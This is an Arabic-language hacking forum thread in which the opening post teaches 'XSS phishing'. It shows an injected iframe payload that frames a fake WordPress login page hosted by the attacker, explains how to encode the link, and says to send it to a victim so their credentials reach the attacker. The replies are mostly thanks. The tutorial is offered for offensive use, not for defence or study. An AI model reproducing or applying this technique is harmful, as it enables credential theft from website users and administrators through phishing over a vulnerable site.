يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > حقن xss - ssi
تحديث الصفحة جديد استخدامات xss وهي الـ phishing login
التسجيل التعليمات التقويم مشاركات اليوم البحث

إضافة رد
صفحة 1 من 2 1 2
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-10-2011, 03:33 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية JetLi
 

 
 
إحصائية العضو






JetLi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
JetLi is on a distinguished road
. جديد استخدامات xss وهي الـ phishing login

السلام عليكم
هذا استخدام غير معروف لثغرة xss
تعبت في عمل الفيديو والشرح راجاء اعمل تقييم ويمنتنع رودوم من نوع شكراً
الفكرة تعتمد على الدمج بين الصفحات المزورة واترككم مع الفيديو خخخخخخخ

حمل الفيديو من هنا

تحميييييل


~~~~~~~~~~~~~~~~~~~~

~

بسم الله الرحمن الرحيم
السلام عليكم

معكم IronMan من
شبكة العناكب الاحترافية

درسنا اليوم هو عن استغلال شبه غير معروف عن ثغرة XSS وهو XSS phishing
اي الخداع عن طريق هذه الثغرة، طبعا الكل يعرف سرقة الكوكيز ولكن لماذا
لان نستخدم هذه الثغرة في حقن اكواد HTML في الصفحة؟
سنرى الطريقة تابعوا معي

هذا كود بسيط نصبته في local server وصنعت ثغرة xss بسيطة المتغير المصاب هو x قبل ما نحقنه نشوف عدة خطوات وهي انك ترفع صفحة مزورة على موقع ثاني لنقل

httP://mysite.com/phishing.php

لازم تكون من نفس لوحة التحكم للسكربت الحابي تخترقه يعني مثال ويرد برس

نأتي الان لخطوة الحقن وهي استخدام هذا الكود

<****** frameborder=0 src=http://www.yoursite.com/wp-login.php? height=700px width=1250px ></******>

لاحظ رابط الصفحة المزورة يجب ان تتأكد منه وتعدل ه بما يناسبك

لازم تظبط ابعاد الصفحة قبل ما ترسلها يعني صفحة ملغمة
لا تنسى انه كود form action يرسل البيانات لك او يحفظها تقريبا شبيه بخطوات حفظ الكوكيز ، المهم
عندما نحقن الكود اعلاه في الصفحة ستظهر لوحة التحكم ويمكنك ارسالها للمستهدف ، بعد ما تشفر الكود الاخير بأي اداة من ادوات hackbar
تلك لاضافة في الفاير فوكس
ابحث عنها في قوقل ولا تكون كسلان


وليصبح الرابط في النهاية

http://localhost/mblue_u/test.php?x=...E%3C/******%3E

وبكذا ترسلوا الرابط للضحية
او تتفننوا علي كيفيكم مثل ما تسرقون الكوكيز يمكنك ان تصنع صفحة مزورة بهذه الطريقة ول ايشك ابدا حتى لو نظر للعنوان سيجد انه في الموقع
وبكذا انتهى



الدرس
اخوكم / ايرون مان هكر
شبكة العناكب الاحترافية
vbspiders.com/vb/




[]d] hsjo]hlhj xss ,id hgJ phishing login phishing page

التوقيع

http://www.pollsb.com/photos/o/33924...tony_stark.jpg
التهكير يجعلك تنظر للحياة بعمق وترو

 

التعديل الأخير تم بواسطة bleu moon ; 09-10-2011 الساعة 06:59 PM.

   

رد مع اقتباس
قديم 09-10-2011, 06:52 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 
 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

هههه عملت الفيديوا اذن ...
بارك الله فيك ...
لي عوده ...

   

رد مع اقتباس
قديم 09-10-2011, 07:02 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 
 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

ينقل الى مرجع تغرات xss

http://www.vbspiders.com/vb/t58067-p...tml#post388177

   

رد مع اقتباس
قديم 09-10-2011, 07:03 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية agentsimo
 

 
 
إحصائية العضو





agentsimo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
agentsimo is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

thxxxx

   

رد مع اقتباس
قديم 09-10-2011, 07:09 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية JetLi
 

 
 
إحصائية العضو






JetLi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
JetLi is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

لكن كذا دفنت الموضوع كان تتركه اسبوع

التوقيع

http://www.pollsb.com/photos/o/33924...tony_stark.jpg
التهكير يجعلك تنظر للحياة بعمق وترو

 

   

رد مع اقتباس
قديم 09-10-2011, 07:13 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 
 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

هيك احسن هههه

   

رد مع اقتباس
قديم 09-11-2011, 07:58 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية JetLi
 

 
 
إحصائية العضو






JetLi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
JetLi is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

نو نو ما احسن ولا شيء هذا يعتبر دمج ما بين قسم البريد واختراق المواقع ههههه

التوقيع

http://www.pollsb.com/photos/o/33924...tony_stark.jpg
التهكير يجعلك تنظر للحياة بعمق وترو

 

   

رد مع اقتباس
قديم 10-13-2011, 03:04 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية hiplorenzo
 

 
 
إحصائية العضو





hiplorenzo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hiplorenzo is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

nice merci bcp

   

رد مع اقتباس
قديم 10-16-2011, 02:41 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية msbhacker
 

 
 
إحصائية العضو





msbhacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
msbhacker is on a distinguished road
تحدي رد: جديد استخدkمات xss وهي الـ phishing login

thanks u very much

   

رد مع اقتباس
قديم 10-18-2011, 12:10 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية samourai_7
 

 
 
إحصائية العضو






samourai_7 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
samourai_7 is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

شـكــ وبارك الله فيك ـــرا لك

   

رد مع اقتباس
قديم 10-24-2011, 01:21 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية يحيى زكريا
 

 
 
إحصائية العضو






يحيى زكريا غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
يحيى زكريا is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

موضوع اكثر من رائع

   

رد مع اقتباس
قديم 11-14-2011, 02:00 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية RyaX
 

 
 
إحصائية العضو






RyaX غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
RyaX is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

ماد لو حطية باتش بدل الصفح

   

رد مع اقتباس
قديم 11-14-2011, 10:31 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية دام علاء العماد
 

 
 
إحصائية العضو








دام علاء العماد غير متواجد حالياً

إرسال رسالة عبر Skype إلى دام علاء العماد

 

 

إحصائية الترشيح

عدد النقاط : 10
دام علاء العماد is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

بارك الله فيك يا أخي الكريم على هذا الدرس القيم و جزاك الله عنا خير الجزاء

   

رد مع اقتباس
قديم 12-05-2011, 06:20 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية bigotoo
 

 
 
إحصائية العضو






bigotoo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
bigotoo is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

مشكـــــور تسلم ثغرة حلوة

   

رد مع اقتباس
قديم 12-07-2011, 07:53 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية dal3_3ny
 

 
 
إحصائية العضو






dal3_3ny غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dal3_3ny is on a distinguished road
افتراضي رد: جديد استخدامات xss وهي الـ phishing login

thanxxxxxxxxxxxxxxxxxx

   

رد مع اقتباس
إضافة رد
صفحة 1 من 2 1 2

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
login, phishing page, xss

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


الساعة الآن 09:21 AM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0